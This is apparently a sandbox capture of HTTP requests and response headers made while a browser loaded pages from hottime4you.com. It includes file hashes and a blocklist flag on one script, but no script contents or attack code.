User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ol/all/de/ms/25-687828/js/backoffer.js HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:33 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wVsQyx%2FOwXzVKN7%2BY0zTMyps3pbEb0i2WnPrIiU8Og2hd3NVEhbP2RBv3bQLSs0dYHHHHH0ZBMMMmAzaOv72zNjjP6IL1GvZP0UinjBrVGT%2FAl4P33kHYVrLybHQdVkhJzo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfc080cb521-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text, with very long lines (430), with no line terminators
Size:   230
Md5:    d1d761e3721375472889577260906f9c
Sha1:   c5e6e54e8b6b84af216d867dca79eb00c2819e42
Sha256: de8798dd7447b4651ec2d44931c15ceb0d3e5099997b2ddc2452d3f95092a1a2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.42
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 31017
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sun, 02 Oct 2022 18:46:42 GMT
expires: Mon, 02 Oct 2023 18:46:42 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
last-modified: Wed, 10 Mar 2021 14:28:09 GMT
age: 133152
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   31017
Md5:    7808e0e4b7a714230373852158500533
Sha1:   4a79d18722a68a2f38d52e2d3a11b550bdd30b3c
Sha256: 8ba5796bee6a065b8b31895e7e8d59ba564cfd36d2ce056e327588e67736f054
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.158
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Tue, 04 Oct 2022 07:45:54 GMT
Last-Modified: Tue, 04 Oct 2022 06:41:13 GMT
Server: ECS (nyb/1D13)
X-Cache: Miss from cloudfront
Via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: tb4Nzy8B30PDViT6skGzVQcVEbKtBUaL_eiLzBVfoXiHJSkj4NKSWA==
Age: 3881

                                        
                                            GET /mng/channels/init.min.js?ver=1638888212 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.86
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 21924
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 02:50:44 GMT
etag: "2ea196bb9d9670ec138eb0c8c23e6696"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: G6YR1gi2mqWNUJyM7kfugi2KBEL5w1NRkef2mCLRqpUJyKPZc7VwyA==
age: 17770
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   21924
Md5:    2ea196bb9d9670ec138eb0c8c23e6696
Sha1:   b0876fd8c0c56c5d34368c16a829c040c23cbaba
Sha256: 1475c052ae8dbc220775cd44b20e508e38db9f09168c57d4a73e0a9027f252f7
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B12EC8437562CF2BEB1F5218AB1D291D1ADCD2827DC62398CAED91C63DB60B0C"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=244
Expires: Tue, 04 Oct 2022 07:49:58 GMT
Date: Tue, 04 Oct 2022 07:45:54 GMT
Connection: keep-alive

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 07:29:33 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 04 Oct 2022 08:26:00 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 410f51195842d9b592b15d6588c36654.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: ZF1qJ9ARmLtxZTuCmK_HVH8JdCNfywjbZIALXS2PuiQUMyl6JZ13CA==
Age: 981


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5327
Cache-Control: 'max-age=158059'
Date: Tue, 04 Oct 2022 07:45:55 GMT
Last-Modified: Tue, 04 Oct 2022 06:17:08 GMT
Server: ECS (ska/F71B)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B4FF4E9889EC9C279BBE99F41CFDE4F340421C33863A764110422277454DE5DF"
Last-Modified: Mon, 03 Oct 2022 10:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2722
Expires: Tue, 04 Oct 2022 08:31:17 GMT
Date: Tue, 04 Oct 2022 07:45:55 GMT
Connection: keep-alive

                                        
                                            GET /s/quattrocentosans/v18/va9c4lja2NVIDdIAAoMR5MfuElaRB0zJt08.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://hottime4you.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 24320
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 23:47:50 GMT
expires: Thu, 28 Sep 2023 23:47:50 GMT
cache-control: public, max-age=31536000
age: 460685
last-modified: Wed, 27 Apr 2022 16:02:38 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 24320, version 1.0\012- data
Size:   24320
Md5:    056a6ed9c698772e2438032629f4933e
Sha1:   e88b32e3d9492e241bf5451e95967c5597f29967
Sha256: 86380b40e3d14ed9f3e0a5ff79c04f510d7910f677a66685e2b10f8b8765797f
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ol/all/de/ms/25-687828/images/12.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 58018
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:27 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYWmZGJ2PhocMSJzp%2F3r8TqihzsF9IrTxre9sCWsco4tZqu%2BjwWxMqCAFEDfNiSmfbtM7XeeCaB3JA2YbtTDvrfFSuogby5ISPooT69%2BdotiaUUz4RTjk1QgPX%2FIr3Hwaf8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8bddb4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   58018
Md5:    46fb821d3c8ca1b808dcc54300710f89
Sha1:   8c2af696ea30e845c7c8cc249909e26755de3f8d
Sha256: 48f9f84693e443822172bc338b16f6bed62c4cbeb686f8018dcd2bf691007b62
                                        
                                            GET /ol/all/de/ms/25-687828/images/31.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 59718
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XSx27UPFZKOY3BArMykJzAXb4IOxVf%2BsjTrsvdjS5Bf7hCKMaRcZ%2Fvbs2fEL8q3SbjQ5UvYhUZ9J%2BQgvye%2BxWWwjRLGY9QFTlgV5cQaP1FD3N03VDMju%2FbCH%2BEdjdEX0ayg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8a10b523-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   59718
Md5:    8219bfcdb7286bd03b2295e4065d3c38
Sha1:   459b57ce62406ba97b9682cf8da47fc53f18fe2f
Sha256: 78ecebccf0b424f613fac6ca2c34e5d9bc7cccab0b2b0cc88efb23bb2a8a6bea
                                        
                                            GET /ol/all/de/ms/25-687828/images/25.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 67145
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t4Q3Q9%2FkIc6CSr6GoyzNBRLVDut2Ic7xiHn9p0XroyUfTUo2Hc3MgdiDJ70XQGpXS7GqiB%2Bl%2FduqWPyqqMOeeMF0Jt8F9xGtQxKb8JVZeG3Kui6DKtzR%2FI4U4syyCi22VcQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8cc6b521-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   67145
Md5:    d1b1b830be86c68486835a237652ed19
Sha1:   a72ee10174523bbcea9e7fbb09dd79de10e6f38d
Sha256: 9809a272cdb59025422645d54b003a4b425ea461e3fe7218d83f6551a55b5e1b
                                        
                                            GET /ol/all/de/ms/25-687828/images/32.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 55175
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vmux04%2Bgm8rNeouxwrrWvuvGvIcjJgBQYU1kgPoEXujrPdVcHGFY0rRQI%2BDEIW3mfqRg0yPUc%2FDIVGNVz2nmPmTbwRKUBC6xEZMwmeJiO84%2FRVfsD8W7zbUK9302nZ1i5j0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8cd60afe-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   55175
Md5:    8c58ae244f7bd521506573d2589cf8b9
Sha1:   a7ce9a4e1cb43e2f4efe2094f576285b4f25b9c6
Sha256: c178cb0498a1a548575f8f9e3911e45fdef95cfbb7b229fabb1955aca060fdf8
                                        
                                            GET /ol/all/de/ms/25-687828/images/24.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 58158
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MSDZRCqX1OhPQXfJ%2Ffi292OH4Z5yCxlQPdRv1MTk4AkRSTjFzoX%2FPLgvF8V0vL1qo8mDyo%2F6%2Bch6V8EpiYK6m2YlJtFtaQ8HizevdiHjc4e%2BZBrdHVADX0FrANkbXz2nx5s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8fe9b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   58158
Md5:    5275c3e17ee2ba370c01ae31249d42af
Sha1:   98c09ca29deff276fd966d313599ffdf397c55e4
Sha256: f05b3a33818bc9d5dd44fe4074f1818f19efb54d70def227b72ab36ea5bd2c78
                                        
                                            GET /ol/all/de/ms/25-687828/images/42.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 63889
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QHoit%2Bbu%2BeYSS9p4DE9oysp9mxD1gJghbRK%2B0tdpG9iUywsDCCCufHEi%2F13K%2FvyN5yIE5QTawaPD0XtElOBubZFvAhYsBN0N6NWdICfyOCFWYKcr8yx%2B%2F5VONHdCNMDfGEg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff89dfb4f7-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
